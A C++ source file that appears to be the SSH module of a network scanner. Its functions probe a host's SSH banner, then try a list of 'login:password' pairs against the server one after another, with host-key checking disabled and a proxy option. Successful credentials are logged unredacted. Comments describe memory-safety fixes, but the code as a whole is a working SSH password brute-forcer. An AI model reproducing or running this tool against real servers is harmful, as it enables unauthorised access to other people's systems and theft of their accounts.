#include "SSHAuth.h"
#include "FileUpdater.h"
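/**
 * Opens a TCP connection to host:port through libcurl (via the configured proxy
 * when one is set) and runs a single libssh password authentication on the
 * resulting socket.
 *
 * @param user  Intentionally unused. Its only former use was an unbounded
 *              strcpy/strcat of user + "@" + host into a 128-byte stack buffer
 *              that nothing read afterwards; that copy is gone because it could
 *              overrun the buffer and had no effect on the result.
 * @param pass  Password handed to ssh_userauth_password().
 * @param host  Target host, given to libcurl as CURLOPT_URL.
 * @param port  Target TCP port.
 * @return  0 when authentication succeeded, and also when no curl handle could be
 *          created or libcurl reported no socket; -1 when ssh_new() failed or the
 *          server rejected the password; -2 when the curl connect or
 *          ssh_connect() failed.
 */
int _sshConnect(const char *user, const char *pass, const char *host, int port) {
    (void)user;

    CURL *curl = curl_easy_init();
    int sshTimeout = gTimeOut + 1;

    if (curl)
    {
        curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
        curl_easy_setopt(curl, CURLOPT_URL, host);
        // curl_easy_setopt is variadic and reads these options as long, so an int
        // argument has to be widened explicitly.
        curl_easy_setopt(curl, CURLOPT_PORT, static_cast<long>(port));
        // Peer and host certificate verification are switched off on this handle.
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);

        const int proxyPort = std::atoi(gProxyPort);
        const bool useProxy = strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535);
        if (useProxy) {
            curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
            curl_easy_setopt(curl, CURLOPT_PROXYPORT, static_cast<long>(proxyPort));
        } else {
            curl_easy_setopt(curl, CURLOPT_PROXY, "");
        }

        curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
        curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
        // Only establish the connection; the SSH exchange is done by libssh below.
        curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);

        int res = curl_easy_perform(curl);

        // CURLINFO_LASTSOCKET stores a long. Writing it straight into a socket_t
        // overruns the variable where socket_t is narrower than long and leaves
        // it partly uninitialised where it is wider, so go through a long first.
        long lastSocket = -1;
        curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &lastSocket);
        socket_t sock = static_cast<socket_t>(lastSocket);

        if (res != CURLE_OK) {
            curl_easy_cleanup(curl);
            ++ssh;
            return -2;
        }

        if (sock != -1) {
            ssh_session ssh_session = ssh_new();
            if (ssh_session == NULL)
            {
                // Nothing to free: the session was never allocated.
                curl_easy_cleanup(curl);
                return -1;
            }

            // NOTE(review): the value argument of the next two calls is a literal
            // 0, i.e. a null pointer rather than a pointer to an int holding 0,
            // and the return values are ignored -- confirm libssh applies them.
            ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
            ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
            ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);

            //Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
            ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);

            res = ssh_connect(ssh_session);
            if (res != SSH_OK) //Offline
            {
                ssh_disconnect(ssh_session);
                ssh_free(ssh_session);
                curl_easy_cleanup(curl);
                return -2;
            }

            // The username argument is NULL here, as in the code under review.
            res = ssh_userauth_password(ssh_session, NULL, pass);
            if (res != SSH_AUTH_SUCCESS)
            {
                ssh_disconnect(ssh_session);
                ssh_free(ssh_session);
                curl_easy_cleanup(curl);
                return -1;
            }

            ssh_disconnect(ssh_session);
            ssh_free(ssh_session);
        } else {
            stt->doEmitionRedFoundData("[SSH]Socket = -1 " + QString(host) + ":" + QString::number(port));
        }
    }

    // curl_easy_cleanup accepts a null handle, so this is safe on every path.
    curl_easy_cleanup(curl);
    ++ssh;
    return 0;
}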
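/**
 * Connects to ip:port through Connector::nConnect and returns the first byte of
 * whatever was received.
 *
 * The return type is a single char, so only that first byte ever leaves this
 * function. The 256-byte staging buffer that used to be filled with strncpy
 * (using a length truncated to int, and left unterminated for responses of 256
 * bytes or more) was never read past index 0 and is therefore not kept.
 *
 * @param ip    Host to connect to.
 * @param port  TCP port to connect to.
 * @return First byte of the response, or 0 when nothing was received.
 */
char _get_ssh_banner(const char *ip, int port) {
    std::string response;
    Connector::nConnect(ip, port, &response);

    return response.empty() ? '\0' : response[0];
}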
/**
 * Runs one _sshConnect() attempt and records the outcome.
 *
 * When BALogSwitched is set, the user:pass pair, host and port are handed to
 * stt->doEmitionBAData before the attempt. On success the pair and host are
 * handed to stt->doEmition_BAGreenData and "<userPass>@<host>|+|<banner>" is
 * appended to *buffer. The credential text is passed on unredacted in both
 * places.
 *
 * @param user      Login forwarded to _sshConnect().
 * @param pass      Password forwarded to _sshConnect().
 * @param userPass  The same pair in its "login:password" text form, used for
 *                  the emitted messages and the result line.
 * @param host      Target host.
 * @param port      Target TCP port.
 * @param buffer    Result string that is appended to on success; must not be null.
 * @param banner    Text appended after the "|+|" separator; must not be null.
 * @return 0 on success, otherwise the value returned by _sshConnect().
 */
int check_ssh_pass(const char *user, const char *pass,
                   const char *userPass, const char *host, int port,
                   std::string *buffer, const char *banner) {
    if (BALogSwitched) {
        stt->doEmitionBAData("Probing SSH: " + QString(userPass) + "@" + QString(host) + ":" + QString::number(port));
    }

    const int status = _sshConnect(user, pass, host, port);
    if (status != 0) {
        return status;
    }

    stt->doEmition_BAGreenData("[+] SSH: " + QString(userPass) + "@" + QString(host));

    // Result line layout: <userPass>@<host>|+|<banner>
    buffer->append(userPass).append("@").append(host).append("|+|").append(banner);
    return 0;
}
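/**
 * Walks the first MaxSSHPass entries of sshlpLst, each expected in the form
 * "login:password", and passes them one by one to check_ssh_pass().
 *
 * Entries are split with std::string instead of being copied into fixed
 * char[64]/char[32] arrays with strcpy/strncpy: an entry of 64 or more
 * characters, or a login or password of 32 or more, used to write past the end
 * of those stack arrays.
 *
 * @param host    Target host.
 * @param port    Target TCP port.
 * @param buffer  Result string forwarded to check_ssh_pass().
 * @param banner  Banner text forwarded to check_ssh_pass().
 * @return  1 when an entry other than the first was accepted;
 *         -2 when the very first entry was accepted (the original marks this
 *            case "Failhit") or when check_ssh_pass() returned -2;
 *         -1 when an entry has no ':' separator, when the list was exhausted,
 *            or when globalScanFlag was cleared.
 */
int SSHBrute(const char* host, int port, std::string *buffer, const char *banner) {
    for (int i = 0; i < MaxSSHPass; ++i)
    {
        if (!globalScanFlag) break;

        const std::string entry(sshlpLst[i]);
        const std::string::size_type sep = entry.find(':');
        if (sep == std::string::npos) {
            stt->doEmitionRedFoundData("[SSH]Wrong format: " + QString(entry.c_str()));
            return -1;
        }

        // Everything before the first ':' is the login, everything after it the password.
        const std::string login = entry.substr(0, sep);
        const std::string pass = entry.substr(sep + 1);

        const int res = check_ssh_pass(login.c_str(), pass.c_str(), entry.c_str(),
                                       host, port, buffer, banner);

        if (res == 0)
        {
            if (i == 0) return -2; //Failhit
            return 1;
        }
        else if (res == -2)
        {
            return -2;
        }

        // Fixed half-second pause between attempts.
        Sleep(500);
    }

    return -1;
}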
// File-scope strings; none of the functions visible in this listing reference them.
QString strIP, strPort;
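/**
 * Entry point for one host: waits for a free slot under gMaxBrutingThreads,
 * probes the port with _get_ssh_banner() and, if anything answered, runs
 * SSHBrute().
 *
 * _get_ssh_banner() returns a single char. The previous code bound that char to
 * a const reference and then treated its address as a C string (strlen() and
 * the banner argument of SSHBrute()), which reads past the one-byte object. The
 * byte is now stored in a two-element, NUL-terminated array so both uses stay
 * inside the object.
 *
 * @param ip      Target host.
 * @param port    Target TCP port.
 * @param buffer  Result string forwarded to SSHBrute().
 * @return The value returned by SSHBrute(), or -1 when gMaxBrutingThreads is
 *         not positive or the probe returned no data.
 */
int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
{
    if (gMaxBrutingThreads > 0) {

        // Polls once per second until the running count drops below the limit.
        while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000);

        const char bannerText[2] = { _get_ssh_banner(ip, port), '\0' };
        if (bannerText[0] != '\0')
        {
            // NOTE(review): BrutingThrds is changed here without any visible
            // synchronisation -- confirm its type is atomic if SSHLobby can run
            // on several threads.
            //BruteUtils::BConInc();
            ++BrutingThrds;
            const int res = SSHBrute(ip, port, buffer, bannerText);
            --BrutingThrds;
            //BruteUtils::BConDec();
            return res;
        }

        return -1;
    }

    return -1;
}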